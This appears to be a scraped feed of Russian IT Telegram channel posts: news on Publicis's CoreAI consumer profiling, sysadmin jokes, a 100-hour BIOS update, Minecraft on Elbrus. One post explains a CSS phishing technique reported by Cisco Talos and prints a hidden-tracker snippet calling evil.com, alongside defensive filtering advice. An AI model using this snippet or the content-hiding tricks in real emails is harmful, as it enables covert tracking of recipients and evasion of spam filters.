😐 «Мы знаем всё о вас»: рекламная корпорация похвасталась тотальной слежкой за пользователями

Французская Publicis Groupe выпустила видео, которое заставило экспертов по кибербезопасности схватиться за голову. Алгоритм CoreAI анализирует поведение 91% взрослых интернет-пользователей, предсказывая их действия и влияя на выбор.

❓ Как это работает?

— В видео Publicis представила модельного пользователя Лолу, которая олицетворяет среднестатистического потребителя.

— Компания знает о ней буквально все: что она читает, смотрит, где живет, с кем общается, что и где покупает, а главное — почему она это делает 🛍

— CoreAI анализирует даже такие детали, как инфляция и изменения цен на товары, предсказывая, что Лола, например, переключится на более дешевый бренд сока для своих детей.

— Как только алгоритм делает такой вывод, Publicis тут же начинает показывать ей рекламу именно этих более дешевых товаров.

❗️ Эксперты обеспокоены: индустрия брокеров данных остается нерегулируемой, непрозрачной и опасной. Компании вроде Publicis собирают огромные массивы информации о пользователях, продают их третьим лицам, а конечная судьба этих данных остается неизвестной.

😱 — Это уже перебор!
😴 — Пусть смотрят, мне скрывать нечего.
😁 — Реклама дешёвого сока? Да это же гениально!

🥸 godnoTECH - Новости IT

Неправильно.
Это кнопка № 0

Типичный 🎹 Сисадмин

#предложка
Мы как-то iRu взяли. Я первые несколько секунд был озадачен.

Типичный 🤔 Сисадмин

Новый фишинг: Использование CSS для обхода спам-фильтров и слежки за пользователями.

Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами.

Как это работает, в двух словах:

Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который:

🟢Прячет фишинговый контент: Используют CSS-свойства вроде text-indent: -9999px, opacity: 0 и другие, чтобы скрыть вредоносные элементы от глаз пользователей и простых спам-фильтров, которые смотрят на видимый текст.
🟢Организует слежку: Через @media-запросы (например, @media (max-width: 600px)) отслеживают взаимодействие с письмом – изменение размера окна, клики и т.п. – и отправляют данные на сервер злоумышленников.
🟢Обходит детекцию: Без JavaScript письмо выглядит менее подозрительно для систем, которые заточены на ловлю скриптов или вредных вложений.

Вот пример кода для наглядности:

<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://evil.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>

Принцип работы трекера:

Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя.

Технические нюансы:

🟢JavaScript free: Вся схема работает только на HTML и CSS, что делает ее устойчивой к блокировщикам скриптов.
🟢Слабое место фильтров: Большинство спам-фильтров пока не умеют глубоко анализировать CSS на предмет таких штук, а сигнатуры еще не обновились.
🟢Вариативность сокрытия: Кроме text-indent и opacity, могут использовать position: absolute с отрицательными координатами или font-size: 0 для маскировки текста. Главное – скрыть видимое, но сохранить работоспособность трекера при рендеринге.

Что делать сисадминам, чтобы не пропустить новый фишинг:

🟢Прокачать фильтры: Настроить почтовые шлюзы на более глубокий анализ CSS в HTML-письмах. Для SpamAssassin, например, можно добавить правила для отлова подозрительных @media-запросов.
🟢Мониторить исходящий трафик: Следить за запросами к подозрительным доменам из почтовых клиентов, особенно если видите запросы на загрузку фоновых изображений (background: url()).
🟢Просвещать пользователей.

Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде.

Пора пересесть на lynx и читать почту в терминале 😬

Типичный 🥸 Сисадмин

🔧 Обновление BIOS длилось более 100 часов: уникальный случай с платой Biostar

• Пользователь Reddit с ником GoatWithAGun решил обновить BIOS своей системной платы BioStar A320MH — процесс начался, сразу пошёл странно, но при этом не прекращался.

• Обновление не завершалось: сначала час, потом сутки, а в итоге — более 100 часов.

• В итоге процесс завершился сбоем, и система перестала работать.

Интересно, спустя первый час его ничего не смутило? 😂

Типичный 🥸 Сисадмин

#предложка
Очень страшно начинать 😶

🥸: Еще больше масла в огонь подливает тот факт, что на стуле следы от обуви... Какова вероятность, что предыдущий админ выпилился?

Типичный 😬 Сисадмин

👾 На российском процессоре Эльбрус-8СВ запустили Minecraft

YouTube-канал Elbrus PC Play для запуска взял «старенькую» версию Minecraft 1.12.2; а в «роли Java» использовал OpenJDK 8.

• Нагрузка на видеокарту обычно была на уровне 5-15%
• На процессор — 10-20%, иногда поднималась до 30%.

🥸 godnoTECH - Новости IT